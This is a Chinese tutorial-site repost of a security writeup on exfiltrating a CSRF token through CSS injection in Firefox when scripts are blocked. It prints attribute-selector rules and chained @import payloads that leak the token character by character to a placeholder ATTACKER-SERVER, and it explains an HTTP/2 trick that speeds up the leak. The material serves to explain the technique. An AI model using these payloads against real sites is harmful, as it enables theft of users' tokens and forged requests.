在Firefox浏览器中如何利用CSS窃取数据在Firefox浏览器中利用CSS窃取数据实例

时间：2020-02-18 编辑：袖梨来源：一聚教程网

本篇文章小编给大家分享一下在Firefox浏览器中利用CSS窃取数据实例，小编觉得挺不错的，现在分享给大家供大家参考，有需要的小伙伴们可以来看看。

为了演示方便，这里假设我们想窃取元素中的CSRF令牌。

css;">

我们无法使用脚本（可能是因为CSP），因此想寻找基于样式的注入方法。传统方法是使用属性选择器，如下所示：

input[name='csrftoken'][value^='a'] {
  background: url(//ATTACKER-SERVER/leak/a);
}
input[name='csrftoken'][value^='b'] {
  background: url(//ATTACKER-SERVER/leak/b);
}
...
input[name='csrftoken'][value^='z'] {
  background: url(//ATTACKER-SERVER/leak/z);
}

如果应用了CSS规则，那么攻击者就能收到HTTP请求，从而获取到令牌的第1个字符。随后，攻击者需要准备另一个样式表，其中包含已窃取的第1个字符，如下所示：

input[name='csrftoken'][value^='aa'] {
  background: url(//ATTACKER-SERVER/leak/aa);
}
input[name='csrftoken'][value^='ab'] {
  background: url(//ATTACKER-SERVER/leak/ab);
}
...
input[name='csrftoken'][value^='az'] {
  background: url(//ATTACKER-SERVER/leak/az);
}

通常情况下，攻击者需要重新加载中已加载的页面，以便提供后续样式表。 </p> <p> 在2018年， Pepe Vila 提出了一个非常不错的想法，可以在Chrome浏览器中滥用 CSS递归import 方式，通过单个注入点完成相同任务。在2019年，Nathanial Lattimer（ @d0nutptr ）重新提出了相同技巧，但稍微做了点改动。 </p> <p> 简而言之，第一次注入用到了一堆import： </p> <pre class="brush:css;">@import url(//ATTACKER-SERVER/polling?len=0); @import url(//ATTACKER-SERVER/polling?len=1); @import url(//ATTACKER-SERVER/polling?len=2); ...</pre> <p> 核心思想如下： </p> <p> 1、在一开始，只有第1个@import会返回样式表，其他语句处于连接阻塞状态。 </p> <p> 2、第1个@import返回样式表，泄露令牌的第1个字符。 </p> <p> 3、当泄露的第1个令牌到达ATTACKER-SERVER，第2个import停止阻塞，返回包含第1个字符的样式表，尝试泄露第2个字符。 </p> <p> 4、当第2个泄露字符到达ATTACKER-SERVER时，第3个import停止阻塞……以此类推。 </p> <p> 这种技术之所以行之有效，是因为Chrome会采用异步方式处理import，因此当任何import停止阻塞时，Chrome会立即解析该语句并应用规则。 </p> <p> Firefox及样式表处理 </p> <p> 前面提到的方法并不适用于Firefox，与Chrome浏览器相比，Firefox对样式表的处理方式大不相同。这里以几个案例来说明其中差异。 </p> <p> 首先，Firefox会采用同步方式处理样式表。因此，当样式表中有多个import时，只有当所有import都处理完毕时，Firefox才会应用CSS规则。考虑如下案例： </p> <pre class="brush:css;"><style> @import '/polling/0'; @import '/polling/1'; @import '/polling/2'; </style></pre> <p> 假设第1个@import返回CSS规则，将页面背景设置为蓝色，后续的import处于阻塞状态（比如永远不会返回任何内容，会挂起HTTP连接）。在Chrome浏览器中，页面会立即变为蓝色，而在Firefox中并不会有任何反应。 </p> <p> 我们可以将所有import放在独立的<style>元素中，从而解决该问题： </p> <pre class="brush:css;"><style>@import '/polling/0';</style> <style>@import '/polling/1';</style> <style>@import '/polling/2';</style></pre> <p> 在上面代码中，Firefox会分别处理所有样式表，因此页面会立刻变蓝色，其他import会在后台处理。 </p> <p> 但这里还有另一个问题，假设我们想窃取包含10个字符的令牌： </p> <pre class="brush:css;"><style>@import '/polling/0';</style> <style>@import '/polling/1';</style> <style>@import '/polling/2';</style> ... <style>@import '/polling/10';</style></pre> <p> Firefox会立即将10个import加入队列。在处理完第1个import后，Firefox会将带有已知字符的另一个请求加入队列。这里的问题在于，该请求会被加到队列末尾。而在默认情况下，浏览器有个限制条件，到同一个服务器只能有6个并发连接。因此，带有已知字符的请求永远不会到达目标服务器，因为已经有到该服务器的6个阻塞连接，最终出现死锁现象。 </p> <p> HTTP/2 </p> <p> 6个连接的限制条件由TCP层决定，因此到单个服务器只能有6个TCP连接同时存在。在这种情况下，我认为HTTP/2可能派上用场。HTTP/2有许多优点，比如我们可以通过单个连接发送多个HTTP请求（也就是所谓的多路传输（ multiplexing ）），从而大大提升性能。 </p> <p> Firefox对单个HTTP/2连接的并发请求数也有限制，但默认情况下限制数为100（具体设置参考about:config中的network.http.spdy.default-concurrent）。如果我们需要更多并发数，可以使用不同的主机名，强制Firefox创建第2个TCP连接。比如，如果我们创建到https://localhost:3000的100个请求，也创建到https://127.0.0.1:3000的50个请求，此时Firefox就会创建2个TCP连接。 </p> <p> 利用方式 </p> <p> 现在一切准备就绪，我们的主要利用场景如下： </p> <p> 1、利用代码基于HTTP/2。 </p> <p> 2、通过/polling/:session/:index端点可以返回CSS，泄露第:index字符。该请求会处于阻塞状态，直到前一个请求成功泄露第index-1个字符。:session路径参数用来区分多次攻击行为。 </p> <p> 3、通过/leak/:session/:value端点来泄露整个令牌。这里:value为获取到的完整值，而不单单是最后一个字符。 </p> <p> 4、为了强制Firefox向同一个服务器发起2个TCP连接，这里用到了两个端点，分别为https://localhost:3000及https://127.0.0.1:3000。 </p> <p> 5、端点/generate用来生成示例代码。 </p> <p> 创建了一个测试平台，目标是通过这种方式窃取csrftoken。 </p> <p align="center"> <a href="https://img.111com.net/attachment/art/182101/57088f6a7a.png" class="js-smartPhoto-pc" target="_blank"><img alt="" src="https://img.111com.net/attachment/art/182101/57088f6a7a.png" /></a> </p> <p> 有趣的是，由于我们使用的是HTTP/2，因此攻击过程非常快速，不到3秒就能获取到整个令牌。 </p> </div> <div class="pages art-detail"> </div> <ul class="TurnPage"> <li class="TurnPage-left"> <p> <span>上一个：</span> <a href="https://www.111com.net/wy/182100.htm" class="maxWidth">css中有序无序列表项list样式如何设置 css中有序无序列表项list样式设置方法</a> </p> </li> <li class="TurnPage-right"> <p> <span>下一个：</span> <a href="https://www.111com.net/wy/182142.htm" class="maxWidth">CSS3如何实现文字描边 CSS3实现文字描边方法</a> </p> </li> </ul> <div class="articles"> <div class="tit02"> <h4>相关文章</h4> </div> <ul> <li> <a target="_blank" href="https://www.111com.net/cssdiv/228446.htm">CSS 鼠标点击拖拽效果代码展示</a> <span>10-31</span> </li> <li> <a target="_blank" href="https://www.111com.net/cssdiv/228445.htm">CSS使用SVG实现动态分布的圆环发散路径动画教程</a> <span>10-31</span> </li> <li> <a target="_blank" href="https://www.111com.net/cssdiv/227278.htm">CSS组合选择器解析</a> <span>10-26</span> </li> <li> <a target="_blank" href="https://www.111com.net/cssdiv/227276.htm">css带搜索导航栏的代码展示</a> <span>10-26</span> </li> <li> <a target="_blank" href="https://www.111com.net/cssdiv/227258.htm">css复合选择器的具体使用方法介绍</a> <span>10-26</span> </li> <li> <a target="_blank" href="https://www.111com.net/cssdiv/227253.htm">css三列自适应布局教程</a> <span>10-26</span> </li> </ul> </div> </div> </div> </div> </div> <div class="hot-column"> <div class="cont"> <div class="tit"> <h4>热门栏目</h4> </div> <ul class="clearfix"> <li> <h6><a href="https://www.111com.net/phper/php.html" target="_blank">php教程</a></h6> <a href="https://www.111com.net/list-45/" target="_blank">php入门</a> <a href="https://www.111com.net/list-46/" target="_blank">php安全</a> <a href="https://www.111com.net/list-47/" target="_blank">php安装</a> <a href="https://www.111com.net/list-48/" target="_blank">php常用代码</a> <a href="https://www.111com.net/list-49/" target="_blank">php高级应用</a> </li> <li> <h6><a href="https://www.111com.net/net/net.html" target="_blank">asp.net教程</a></h6> <a href="https://www.111com.net/list-78/" target="_blank">基础入门</a> <a href="https://www.111com.net/list-79/" target="_blank">.Net开发</a> <a href="https://www.111com.net/list-80/" target="_blank">C语言</a> <a href="https://www.111com.net/list-81/" target="_blank">VB.Net语言</a> <a href="https://www.111com.net/list-82/" target="_blank">WebService</a> </li> <li> <h6><a href="https://www.111com.net/sj/index.html" target="_blank">手机开发</a></h6> <a href="https://www.111com.net/list-208/" target="_blank">安卓教程</a> <a href="https://www.111com.net/list-209/" target="_blank">ios7教程</a> <a href="https://www.111com.net/list-210/" target="_blank">Windows Phone</a> <a href="https://www.111com.net/list-211/" target="_blank">Windows Mobile</a> <a href="https://www.111com.net/list-212/" target="_blank">手机常见问题</a> </li> <li> <h6><a href="https://www.111com.net/cssdiv/css.html" target="_blank">css教程</a></h6> <a href="https://www.111com.net/list-99/" target="_blank">CSS入门</a> <a href="https://www.111com.net/list-100/" target="_blank">常用代码</a> <a href="https://www.111com.net/list-101/" target="_blank">经典案例</a> <a href="https://www.111com.net/list-102/" target="_blank">样式布局</a> <a href="https://www.111com.net/list-103/" target="_blank">高级应用</a> </li> <li> <h6><a href="https://www.111com.net/wy/yw.html" target="_blank">网页制作</a></h6> <a href="https://www.111com.net/list-136/" target="_blank">设计基础</a> <a href="https://www.111com.net/list-137/" target="_blank">Dreamweaver</a> <a href="https://www.111com.net/list-138/" target="_blank">Frontpage</a> <a href="https://www.111com.net/list-139/" target="_blank">js教程</a> <a href="https://www.111com.net/list-140/" target="_blank">XNL/XSLT</a> </li> <li> <h6><a href="https://www.111com.net/office/index.html" target="_blank">办公数码</a></h6> <a href="https://www.111com.net/list-236/" target="_blank">word</a> <a href="https://www.111com.net/list-237/" target="_blank">excel</a> <a href="https://www.111com.net/list-238/" target="_blank">powerpoint</a> <a href="https://www.111com.net/list-239/" target="_blank">金山WPS</a> <a href="https://www.111com.net/list-240/" target="_blank">电脑新手</a> </li> <li> <h6><a href="https://www.111com.net/jsp/jsp.html" target="_blank">jsp教程</a></h6> <a href="https://www.111com.net/list-68/" target="_blank">Application与Applet</a> <a href="https://www.111com.net/list-69/" target="_blank">J2EE/EJB/服务器</a> <a href="https://www.111com.net/list-70/" target="_blank">J2ME开发</a> <a href="https://www.111com.net/list-71/" target="_blank">Java基础</a> <a href="https://www.111com.net/list-72/" target="_blank">Java技巧及代码</a> </li> </ul> </div> </div> <div class="footer"> <div class="cont"> <p> <a href="https://www.111com.net/" target="_self">一聚教程网</a>| <a href="https://www.111com.net/us/us.html" class="about" target="_self">关于我们</a>| <a href="https://www.111com.net/us/me.html" class="contact" target="_self">联系我们</a>| <a href="https://www.111com.net/us/ads.html" class="gg_contact" target="_self">广告合作</a>| <a href="https://www.111com.net/us/link.html" class="friend_link" target="_self">友情链接</a>| <a href="https://www.111com.net/us/bcinfo.html" class="copyright_notice" target="_self">版权声明</a> </p> <p> <span>copyRight@2007-2024 www.111COM.NET AII Right Reserved <a href="https://beian.miit.gov.cn/" target="_blank" class="beian">苏ICP备17065847号-2</a> </span> </p> <p> <span> 网站内容来自网络整理或网友投稿如有侵权行为请邮件:yijucomnet@163.com 我们24小时内处理 </span> </p> </div> </div> <script src="https://assets.111com.net/js/stat.js?v=2024022101"></script> <script src="https://api.111com.net/api/stat/hits?type=article&id=182101"></script> </body> </html>

推荐专题

最新下载

热门教程

在Firefox浏览器中如何利用CSS窃取数据在Firefox浏览器中利用CSS窃取数据实例

推荐专题

最新下载

热门教程

在Firefox浏览器中如何利用CSS窃取数据 在Firefox浏览器中利用CSS窃取数据实例

在Firefox浏览器中如何利用CSS窃取数据在Firefox浏览器中利用CSS窃取数据实例